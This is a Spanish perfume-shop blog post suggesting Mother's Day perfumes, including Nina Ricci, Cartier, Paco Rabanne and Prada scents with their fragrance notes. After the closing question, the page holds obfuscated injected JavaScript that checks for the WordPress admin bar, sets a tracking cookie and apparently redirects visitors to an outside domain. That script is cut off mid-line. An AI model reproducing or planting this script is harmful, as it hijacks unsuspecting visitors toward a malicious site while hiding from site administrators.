perfumes para el día de la madre

Porque sí amigos, ya estamos a escasos 10 días del Día de la Madre y hay que ir pensando en un regalito para una de las personas más importantes de nuestras vidas.

Desde Perfumerías Tin Tin sabemos que un regalo con el que solemos acertar es un buen perfume.
Por ello hoy venimos con nuestra selección de perfumes para regalar en el Día de la Madre.
Comenzamos con una novedad que nos presenta Nina Ricci como reinterpretación del perfume “Nina” que se lanzó en 2006.
Les Délices de Nina es un perfume de edición limitada inspirado en los cuentos de hadas como Hansel y Gretel o Alicia en el país de las maravillas. Desde su envase que como ya nos tenían acostumbrados siguen conservando su forma de manzana simbolizando un elixir pero en este caso de un color rosa claro y mate en la base de la manzana añadiendo una capa dorada brillante simulando caramelo derretido por encima del tapón, las hojas y la zona superior del frasco.
¿A qué huele? Pues es una mezcla de mandarina y limón como notas de salida que transmite frescor y energía, continuando como notas de corazón con acordes de caramelo de fresa y un toque muy sutil de gardenia. Para acabar como notas de fondo encontramos praliné, almizcles blancos y unos ecos de grosella.

perfume nina ricci les delices de nina

 

 

 

 

 

 

 

 

 

 

 

Continuamos la interpretación de la clásica pantera convertida en perfume La Panthere de Cartier formulada por la perfumista de Cartier, Mathilde Laurent busca la frescura de las notas florales de la gardenia combinada con extractos de chipre y con almizcle. Su espectacular envase reproduce la silueta de la cabeza de un felino, tallado desde el interior del cristal.

perfume cartier la panthere

 

 

 

 

 

 

 

 

 

 

 

Otra idea maravillosa es regalar un cofre de perfume compuesto por el perfume Lady Million de 50 ml, un body lotion de 100 ml y una minitalla de 5 ml ideal para llevar en el bolso. Y es que actualmente Lady Million es el perfume más vendido de la casa Paco Rabanne y no es para menos. Sus notas olfativas comienzan con neroli, limón de Amalfi y frambuesa, continuando de corazón con jazmín, flor del naranjo africano y gardenia, para acabar notas de pachulí, miel blanca y ámbar (+info).

perfume lady million paco rabanne

 

 

 

 

 

 

 

 

 
Y para acabar os sugerimos un must para esta primavera, se trata del perfume de Prada Candy Florale, ideal para esta época del año por su frescura y alegría sabiamente conjuntado con un punto coqueto. Como nota de salida encontramos el limoncello aportando frescura, como nota de corazón peonía aportando un toque floral, para finalizar como notas de fondo y aportando dulzura: caramelo, benjuí, miel y almizcle.

perfume prada candy florale

 

 

 

 

 

 

 

 

 
¿Cuéntanos sueles regalar un perfume en el Día de la Madre? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone